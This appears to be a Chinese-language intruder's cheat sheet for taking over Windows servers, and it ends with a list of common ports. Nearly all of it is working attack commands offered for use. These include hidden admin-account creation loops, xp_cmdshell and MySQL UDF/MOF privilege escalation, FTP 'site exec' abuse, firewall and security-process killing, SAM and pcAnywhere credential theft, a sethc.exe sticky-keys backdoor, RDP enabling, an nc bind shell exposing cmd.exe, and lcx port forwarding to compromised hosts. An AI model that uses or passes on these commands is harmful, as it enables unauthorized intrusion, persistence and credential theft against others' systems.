C:\Documents and Settings\ 
C:\RECYCLER         
C:\WINDOWS\Temp\Cookies
C:\WINDOWS\system32\
c:\winnt\system32\inetsrv\data
c:\winnt\system32\inetsrv\data
c:\Documents and Settings\All Users\「开始」菜单\程序\启动\  写入vbs
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 
这里下他的GIF 文件,在本地安装pcanywhere上去 
C:\windows\system32\config 
C:\WINNT\system32\config\ 下他的SAM 破解之 
C:\Program Files
C:\Documents and Settings\All Users
C:\Program Files\Microsoft SQL Server
C:\WINDOWS\system32\inetsrv\data


for /l %%i in (1,1,1000) do @net user admin$ 123 /add&@net localgroup administrators admin$ /add
建立 bat 运行  突破安全狗


HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber    3389
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MySQL  mysql路径
select @@basedir as basePath from dual  sql获取mysql路径
HKCU\Software\ORL\WinVNC3\Password  vnc
 user.frm   user.MYD  user.MYI 
[IIS6Up]-->Can not find wmiprvse.exe
Windows Firewall
taskkill /f /t /im wmiprvse.exe
ntsd -c q -p 1964 结束进程
net stop sharedacces
NET STOP WINDOWS FIREWALL
net start 
tskill wmiprvse.exe

sa提权
增加一个用户:;exec master.dbo.xp_cmdshell 'net user admin admin /add';-- 
提升为管理员:;exec master.dbo.xp_cmdshell 'net localgroup administrators admin /add';--

net user admincaonimaa caonima /add & net localgroup administrators admincaonimaa /add

mysql+mof
C:\Winnt\udf.dll    2000
C:\Windows\udf.dll 2003
D:\PHPWEB\MySQL Server 5.5\lib\plugin\udf.dll 
C:\Program Files\Microsoft SQL Server\
D:/PHPWEB/MySQL Server 5.5/lib/plugin/moonudf.dll (5.0以上的要在数据库安装目录lib\plugin导出)

select load_file('c:\') into outfile 'c:\windows\system32\wbem\mof\system.mof'


for /l %%i in (1,1,1000) do @net user admin admin /add&@ net localgroup administrators admin /add


mysql语句  3172
   
select cmdshell('net user admin admin /add');  
select cmdshell('net localgroup administrator admin /add');
drop function cmdshell;
select sys_eval('net stop sharedacess')   关闭防火墙


Shutdown -r -f -t 0 -m 重启服务器 

shutdown -r -f -t 1

shutdown -R -T 0

copy C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\sethc.exe    


开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3389:TCP
防火墙是否开放

regedit /e D:\www\3389.reg “HKEY_LOCAL _MACHINE\SYSTEM\CurrentControlSet\Co ntrol\Terminal Server\Wds\rdpwd\Tds\tcp”
cmd执行获取3389端口

ftp提权命令:quote site exec net user dj$ goodwang7 /add

quote site exec net localgroup administrators dj$ /add


lusrmgr.msc----本机用户和组

explorer-------打开资源管理器

regedit.exe----注册表

查看权限: whoami

查看配置:systeminfo

查看用户:net user

查看进程:tasklist

查看正在允许的服务:tasklist /svc

查看开放的所有端口:netstat -an

查询管理用户名:query user

查看搭建环境:ftp 127.0.0.1

查看指定服务的路径:sc qc Mysql

添加一个用户:net user dj dj /add

提升到管理员权限: net localgroup administrators dj /add

添加用户并提升权限:net user dj$ goodwang7 /add & net localgroup administrators dj$ /add

查看所以管理权限的用户: net localgroup administrators

家人远程桌面用户组: net loaclgroup "Remote Desktop Users" admin /add

突破最大连接数:mstsc /admin /v:174.139.222.67

query user  查看会话

logoff ID号  踢掉

C:\RECYCLER\Chu.exe "logoff 1"  


NC反弹

路径\nc.exe -l -p 端口 -t -e 路径\cmd.exe

c:\RECYCLER\nc.exe -l -p 1234 -t -e c:\RECYCLER\cmd.exe

NC上传

DOS界面下运行:

NC -vv www.baidu.com 80<1.txt

-vv: 回显

80: www端口

1.txt: 就是你要发送的数据包


LCX端口转发

先本地监听51端口 lcx.exe -listen 51 3389

c:\recycler\lcx.exe -slave 自己的ip 51 肉鸡IP 3389    LCX转发

c:\recycler\lcx.exe -slave 222.222.222.222 51 111.111.111.111 3389



常用端口号:
代理服务器常用以下端口:
(1). HTTP协议代理服务器常用端口号:80/8080/3128/8081/9080
(2). SOCKS代理协议服务器常用端口号:1080
(3). FTP(文件传输)协议代理服务器常用端口号:21
(4). Telnet(远程登录)协议代理服务器常用端口:23
 
HTTP服务器,默认的端口号为80/tcp(木马Executor开放此端口);
HTTPS(securely transferring web pages)服务器,默认的端口号为443/tcp 443/udp;
Telnet(不安全的文本传送),默认端口号为23/tcp(木马Tiny Telnet Server所开放的端口);
FTP,默认的端口号为21/tcp(木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口);
TFTP(Trivial File Transfer Protocol ),默认的端口号为69/udp;
SSH(安全登录)、SCP(文件传输)、端口重定向,默认的端口号为22/tcp;
SMTP Simple Mail Transfer Protocol (E-mail),默认的端口号为25/tcp(木马Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都
开放这个端口);
POP3 Post Office Protocol (E-mail) ,默认的端口号为110/tcp;
WebLogic,默认的端口号为7001;
Webshpere应用程序,默认的端口号为9080;
webshpere管理工具,默认的端口号为9090;
JBOSS,默认的端口号为8080;
TOMCAT,默认的端口号为8080;
WIN2003远程登陆,默认的端口号为3389;
Symantec AV/Filter for MSE ,默认端口号为 8081;
Oracle 数据库,默认的端口号为1521;
ORACLE EMCTL,默认的端口号为1158;
Oracle XDB( XML 数据库),默认的端口号为8080;
Oracle XDB FTP服务,默认的端口号为2100;
MS SQL*SERVER数据库server,默认的端口号为1433/tcp 1433/udp;
MS SQL*SERVER数据库monitor,默认的端口号为1434/tcp 1434/udp;
QQ,默认的端口号为1080/udp